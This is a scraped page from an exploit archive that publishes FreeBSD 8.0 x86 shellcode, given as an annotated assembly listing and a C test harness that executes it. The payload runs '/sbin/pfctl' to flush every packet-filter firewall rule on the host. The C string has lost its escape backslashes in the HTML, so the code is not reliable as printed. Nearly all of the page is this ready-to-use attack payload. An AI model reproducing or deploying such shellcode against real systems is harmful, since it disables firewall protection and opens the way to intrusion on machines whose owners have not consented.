Home / os / win7

freebsd/x86 /sbin/pfctl -F all Shellcode 47 Bytes

Posted on 15 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>freebsd/x86 /sbin/pfctl -F all Shellcode 47 Bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================================
FreeBSD 8.0-RELEASE/x86 //sbin/pfctl -F all Shellcode 47 Bytes 
==============================================================


/* 
 * Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes'
 * Type: Shellcode
 * Author: antrhacks
 * Platform: FreeBSD 8.0-RELEASE
*/

/* ASSembly
 31 c0                	xor    %eax,%eax
 50                   	push   %eax
 68 2d 46 61 6c       	push   $0x6c61462d
 89 e1                	mov    %esp,%ecx
 50                   	push   %eax
 68 66 63 74 6c       	push   $0x6c746366
 68 69 6e 2f 70       	push   $0x702f6e69
 68 2f 2f 73 62       	push   $0x62732f2f
 89 e3                	mov    %esp,%ebx
 50                   	push   %eax
 51                   	push   %ecx
 53                   	push   %ebx
 89 e1                	mov    %esp,%ecx
 50                   	push   %eax
 51                   	push   %ecx
 53                   	push   %ebx
 b0 3b                	mov    $0x3b,%al
 50                   	push   %eax
 cd 80                	int    $0x80
 31 c0                	xor    %eax,%eax
 50                   	push   %eax
 50                   	push   %eax
 cd 80                	int    $0x80
*/


#include &lt;stdio.h&gt;

int main(){
char shellcode[] = &quot;x31xc0x50x68x2dx46x61x6cx89xe1x50x68x66x63x74x6c&quot;
&quot;x68x69x6ex2fx70x68x2fx2fx73x62x89xe3x50x51x53&quot;
&quot;x89xe1x50x51x53xb0x3bx50xcdx80x31xc0x50x50xcdx80&quot;; 

 printf(&quot;[*] ShellCode size (bytes): %d

&quot;, sizeof(shellcode)-1 );

(*(void (*)())shellcode)();

return 0;
}



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :